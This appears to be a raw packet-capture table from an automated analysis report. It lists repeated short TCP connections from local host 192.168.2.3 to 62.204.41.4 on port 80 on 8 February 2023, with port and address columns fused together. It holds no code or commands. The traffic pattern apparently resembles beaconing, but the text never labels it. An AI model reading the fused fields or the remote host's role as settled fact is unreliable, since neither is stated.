                                                                    Feb 8, 2023 21:32:19.208136082 CET4992480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.268405914 CET804992362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.268536091 CET4992380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.270643950 CET804992462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.270750999 CET4992480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.271281004 CET4992480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.333661079 CET804992462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.336977959 CET804992462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.337157011 CET4992480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.454565048 CET4992480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.455353022 CET4992580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.517628908 CET804992562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.517796993 CET4992580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.517972946 CET804992462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.518055916 CET4992480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.523158073 CET4992580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.585457087 CET804992562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.588732004 CET804992562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.588906050 CET4992580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.701602936 CET4992580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.702418089 CET4992680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.764168024 CET804992562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.764822960 CET4992580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.766916990 CET804992662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.767035007 CET4992680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.767739058 CET4992680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.830133915 CET804992662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.833365917 CET804992662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.836802006 CET4992680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.951667070 CET4992680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.952841043 CET4992780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.016621113 CET804992762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:20.016658068 CET804992662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:20.016874075 CET4992680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.016957998 CET4992780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.024415016 CET4992780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.088433027 CET804992762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:20.094804049 CET804992762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:20.095055103 CET4992780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.246722937 CET4992780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.247373104 CET4992880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.308049917 CET804992862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:20.308259964 CET4992880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.308595896 CET804992762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:20.308778048 CET4992780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:20.315211058 CET4992880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.604844093 CET804995562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.605061054 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.606156111 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.607388973 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.633042097 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.695815086 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.698436975 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.699013948 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.814308882 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.815896034 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.877183914 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.877351999 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.878431082 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.879365921 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.889281034 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.951901913 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.954535961 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.957051039 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.082056046 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.083029985 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.144563913 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.144604921 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.144660950 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.144691944 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.145173073 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.206587076 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.210447073 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.228341103 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.348908901 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.349653006 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.410273075 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.410593987 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.421859980 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.422446966 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.422446966 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.482812881 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.485539913 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.485687017 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.603312969 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.606627941 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.664089918 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.666167021 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.667319059 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.667413950 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.668791056 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.728353977 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.731478930 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.738429070 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.857923031 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.874214888 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.917980909 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.926455021 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.936271906 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.941096067 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.958110094 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.019805908 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.022146940 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.024748087 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.192774057 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.193744898 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.254647970 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.254826069 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.256095886 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.256236076 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.257081032 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.319484949 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.324227095 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.324346066 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.441129923 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.442296982 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.503714085 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.503753901 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.503873110 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.503937006 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.504400969 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.565964937 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.568942070 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.569083929 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.692049980 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.692888975 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.753736973 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.754578114 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.754889965 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.754959106 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.755517960 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.817121983 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.820144892 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.820342064 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.940877914 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.941720963 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.002389908 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.002543926 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.016753912 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.017047882 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.025254965 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.086041927 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.089925051 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.095613956 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.201741934 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.213459969 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.262533903 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.262758970 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.274039984 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.274279118 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.274781942 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.335030079 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.337826014 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.337959051 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.450472116 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.451639891 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.510925055 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.512998104 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.514307022 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.514399052 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.528686047 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.590224981 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.592782021 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.592926025 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.703388929 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.704322100 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.768702984 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.768723011 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.769690037 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.769860029 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.770420074 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.831453085 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.833966017 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.836036921 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.950318098 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.951184988 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.011223078 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.011703014 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.016067028 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.016151905 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.022856951 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.083401918 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.088211060 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.088380098 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.226295948 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.227262020 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.287168980 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.287844896 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.298402071 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.298415899 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.302961111 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.363755941 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.366622925 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.370374918 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.488183022 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.489048004 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.548485041 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.548583031 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.548739910 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.549215078 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.549737930 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.608989000 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.611403942 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.617861986 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.871534109 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.931050062 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.949146032 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.971997023 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.032541037 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.051207066 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.067364931 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.127958059 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.132452011 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.153002024 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.325198889 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.326534033 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.392024994 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.392398119 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.397367001 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.397388935 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.423801899 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.484474897 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.487102985 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.502238989 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.681669950 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.683171034 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.742356062 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.743261099 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.746047974 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.750236988 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.751955986 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.814660072 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.816646099 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.820398092 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:33.812056065 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:33.812931061 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:33.881891012 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:33.902159929 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:34.899807930 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:34.900022984 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.139303923 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.201030016 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.204358101 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.204521894 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.326080084 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.330909967 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.387120008 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.387310982 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.393584967 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.393871069 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.257085085 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.319747925 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.324114084 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.324233055 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.430207014 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.430953979 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.492502928 CET804997762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.062264919 CET805000462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.062963963 CET5000480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.166009903 CET5000480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.167896032 CET5000580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.229542971 CET805000462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.230918884 CET5000480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.231446981 CET805000562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.234992027 CET5000580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.235622883 CET5000580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.298382998 CET805000562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.300940037 CET805000562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.301076889 CET5000580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.416208029 CET5000580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.417371988 CET5000680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.479074001 CET805000662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.479124069 CET805000562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.479412079 CET5000580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.479967117 CET5000680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.479967117 CET5000680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.541512012 CET805000662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.543730974 CET805000662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.546740055 CET5000680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.649882078 CET5000680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.650811911 CET5000780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.712217093 CET805000762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.712449074 CET5000780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.712537050 CET805000662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.712624073 CET5000680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.713026047 CET5000780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.773535967 CET805000762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.776062965 CET805000762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.776215076 CET5000780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.884228945 CET5000780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.886487007 CET5000880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.944843054 CET805000762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.945066929 CET5000780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.947088003 CET805000862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:44.947314978 CET5000880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:44.947787046 CET5000880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.008411884 CET805000862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.012370110 CET805000862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.012535095 CET5000880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.119600058 CET5000880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.120311022 CET5000980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.180625916 CET805000862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.180788040 CET5000880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.182498932 CET805000962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.182606936 CET5000980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.194375038 CET5000980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.256764889 CET805000962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.261404037 CET805000962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.261565924 CET5000980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.375579119 CET5000980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.376511097 CET5001080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.438035965 CET805000962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.438086033 CET805001062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.438138962 CET5000980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.438214064 CET5001080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.438687086 CET5001080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.535765886 CET805001062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.537972927 CET805001062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.538285971 CET5001080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.652831078 CET5001080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.655510902 CET5001180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.714485884 CET805001062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.714648962 CET5001080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.718214035 CET805001162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.718533039 CET5001180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.719027042 CET5001180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.781738997 CET805001162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.784312963 CET805001162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.784579992 CET5001180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.902997971 CET5001180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.903856039 CET5001280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.965818882 CET805001162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.965917110 CET5001180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.966327906 CET805001262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:45.966418982 CET5001280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:45.968971014 CET5001280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.031698942 CET805001262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.034311056 CET805001262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:46.034401894 CET5001280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:46.150851011 CET5001280192.168.2.362.204.41.4
